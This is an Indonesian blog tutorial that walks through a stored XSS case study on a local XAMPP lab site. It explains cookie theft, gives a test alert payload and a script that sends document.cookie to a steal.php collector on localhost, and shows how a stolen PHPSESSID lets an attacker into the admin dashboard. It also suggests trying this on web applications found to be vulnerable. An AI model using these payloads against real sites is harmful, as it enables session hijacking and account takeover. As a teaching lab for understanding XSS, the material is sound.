Studi Kasus: Serangan XSS (Cross-Site Scripting)

Renewable Hacking International Studi 0

Tentang XSS (Cross-Site Scripting)

XSS (Cross-Site Scripting) adalah salah satu dari banyaknya jenis serangan ke web yang terjadi ketika penyerang menyisipkan kode berbahaya dalam bentuk skrip ke dalam web. Kode berbahaya tersebut berpotensi merugikan pengguna pada web yang rentan.

Secara sederhana, XSS bekerja dengan mengeksekusi skrip berbahaya di web browser korban dengan memasukkan skrip/kode berbahaya ke halaman web. Umumnya serangan ini dilakukan menggunakan JavaScript, VBScript, ActiveX, Flash, dan bahasa sisi klien lainnya [Johanna | Dewa Web | 2022].

XSS (Cross-Site Scripting) berpotensi mengambil cookie milik korbannya. Cookie adalah sebuah identitas kita di web browser ketika Kita berselancar di dunia maya. Setelah penyerang berhasil mendapatkan cookie milik korbannya, penyerang akan menggunakan cookie tersebut dengan berkamuflase menjadi korbannya untuk menipu web browser. Alhasil penyerang akan mendapatkan beberapa informasi sensitif dari korban dan informasi lainnya seperti info login akan di validasi oleh browser sebagai korban. Jadi, tanpa memasukkan kredensial login seperti username & password, penyerang tetap dapat masuk ke akun korban.

Gambar ilustrasi dari Pusko Media



Penjelasan tentang XSS lebih luas akan, Kami bahas pada artikel lainnya..

Studi Kasus

Usahakan, Kalian sudah mengerti basic membuat website ketika akan mencoba ini. Atau jika Kalian sudah menemukan web yang vuln terhadap XSS bisa mencoba ini untuk mengujinya. Karena, Kami menjaga kode etik dalam peretasan dan tidak menyediakan live target secara online untuk percobaan serangan. Kami juga tidak menyediakan tutorial running web (live target) di localhost. Oleh karena itu, basic pemrograman sedikit dibutuhkan dalam studi kasus ini.

Hal yang harus dipersiapkan untuk melakukan studi kasus ini adalah
  1. XAMPP. Lihat cara menginstall XAMPP.
  2. Text Editor. Bisa menggunakan VSCode, Notepad++, dan lainnya.
  3. 2 Jenis Web Browser. Bisa menggunakan Chrome dan Firefox.
  4. Extension Cookie Editor di Chrome. Download Ekstensi Disini.
  5. File Simulasi XSS. Chat disini untuk meminta file.
Silahkan untuk mengikuti langkah-langkah berikut ini sebagai bagian utama dari Studi Kasus XSS (Cross-Site Scripting).

  1. Siapkan dua buah web browser untuk digunakan sebagai contoh penyerang dan korban
    2. Kami menggunakan Chrome sebagai penyerang dan Safari sebagai korban, *Karena kami menggunakan MacOS. Jika, Anda menggunakan windows atau linux dan sebagainya bisa menggunakan chrome sebagai penyerang dan firefox sebagai korban.

  2. Jalankan Apache dan MySQL di XAMPP
    3. Jika sudah memiliki file simulasi, silahkan simpan di folder htdocs pada XAMPP dan jalankan website di chrome dan safari/firefox. Lihat cara menjalankan website di localhost.

    Jika sudah, maka web akan tampil seperti ini.


  3. Log In ke web pada safari/firefox
    4. Username: rh_blog
    Password: admin12345
    path login: http://localhost/XSS/login.php . Silahkan sesuaikan path tempat Anda menyimpan file web tersebut.


  4. Buka kembali halaman utama web pada chrome
    5. Buka halaman utama index.php pada chrome untuk memulai serangan. http://localhost/XSS/index.php 

  5. Percobaan Serangan
    6. Silahkan inputkan payload <script>alert('Test XSS');</script> pada form pesan seperti pada screenshot dibawah ini dan klik kirim.



    Silahkan lihat pada bagian "Lihat Pesan" di safari/firefox. Maka hasilnya akan seperti dibawah ini. Hal tersebut menandakan bahwa web tersebut vuln terhadap XSS.


  6. Lakukan Serangan
    7. Jika sudah menemukan kerentanan, silahkan lakukan serangan lanjutan melalui chrome dengan menginputkan payload untuk mengeksploitasi kerentanan menggunakan, <script type="text/javascript">
    document.location='http://localhost/XSS/steal.php?c='+document.cookie;
    </script> .


    Dan buka safari/firefox dan buka halaman "Lihat Pesan".


    Maka menampilkan tulisan "Coookie Diambil hahahahaha!!! :)" yang menandakan bahwa cookie admin/korban berhasil dicuri oleh penyerang.

  7. Exploitasi Kerentanan
    8. Exploitasi kerentanan untuk mendapatkan akses ke akun admin tanpa harus melakukan login terlebih dahulu. Silahkan buka halaman login admin http://localhost/XSS/login.php dan buka phpmyadmin di http://localhost/phpmyadmin/ pada chrome untuk melihat cookie yang berhasil tercuri dari admin.


    Buka phpmyadmin dan buka table cookie. Anda akan melihat cookie admin yang berhasil tercuri


    Silahkan copy dan paste value pada cookie PHPSESSID yang berhasil diambil "15ksjpphvk5rb817q0n1g5kf3p" ke cookie editor di halaman login.


    Dan refresh halaman login, maka hasilnya akan mengalihkan anda ke halaman dashboard tanpa harus memasukkan username dan password hanya dengan menggunakan cookie admin yang berhasil tercuri.


Jika ada pertanyaan lebih lanjut silahkan bergabung dengan komunitas kami di WhatsApp: https://chat.whatsapp.com/EzAfFVsOnsr3H6t0gwLTJK dan Telegram: https://t.me/renewablehacking

Instagram Kami: 
Tags

Post a Comment

Posting Komentar

Lebih baru Lebih lama